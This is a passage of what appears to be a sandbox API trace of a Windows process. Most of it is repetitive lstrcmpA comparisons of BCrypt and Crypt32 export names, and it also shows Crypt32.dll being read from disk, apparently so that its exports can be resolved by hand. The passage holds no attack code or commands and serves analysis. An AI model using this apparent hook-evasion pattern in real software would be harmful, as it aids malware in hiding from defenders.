lpString2="BCryptCreateMultiHash") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0177.299] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0177.300] GetProcessHeap () returned 0x580000 [0177.300] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2cf2010 | out: hHeap=0x580000) returned 1 [0177.300] GetProcessHeap () returned 0x580000 [0177.300] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x599280 [0177.300] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0177.441] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0177.441] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0177.442] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0177.442] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0177.442] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0177.442] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0177.442] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0177.443] GetProcessHeap () returned 0x580000 [0177.443] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c30e0) returned 0x40b0040 [0177.447] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0177.447] ReadFile (in: hFile=0x160, lpBuffer=0x40b0040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40b0040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0177.620] CloseHandle (hObject=0x160) returned 1 [0177.621] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0177.621] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0177.621] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0177.621] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0177.621] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0177.621] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0177.621] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0177.621] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0177.621] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0177.621] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0177.621] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0177.621] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0177.621] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0177.622] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0177.622] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0177.622] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0177.622] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0177.622] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0177.622] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0177.622] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0177.622] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0177.622] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0177.622] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0177.622] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0177.623] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0177.623] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0177.624] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0177.624] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0177.624] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0177.625] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0177.625] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.625] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0177.625] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0177.625] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0177.626] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0177.626] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0177.626] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0177.626] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0177.626] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0177.626] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0177.627] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0177.627] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.627] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0177.627] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0177.627] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0177.628] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", 